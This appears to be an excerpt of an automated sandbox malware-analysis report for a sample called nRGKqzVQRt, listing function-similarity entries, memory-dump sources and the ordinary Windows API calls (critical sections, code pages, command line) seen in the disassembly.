                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 4132704954-2338778587
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00408069
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: @G@K$ZYA.
                                                  • API String ID: 2296764815-4236202813
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00407F59
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: @G@K$A@K.
                                                  • API String ID: 2296764815-2457859030
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006681C0
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: @G@K$A@K.
                                                  • API String ID: 4132704954-2457859030
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006682D0
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: @G@K$ZYA.
                                                  • API String ID: 4132704954-4236202813
                                                  APIs
                                                  • GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,7622DF80,00000000), ref: 0041EAA4
                                                  • GetACP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,7622DF80,00000000), ref: 0041EABB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-2078354741
                                                  APIs
                                                  • GetOEMCP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED0B
                                                  • GetACP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Qg
                                                  • API String ID: 0-32693547
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'u
                                                  • API String ID: 3253501508-1127183452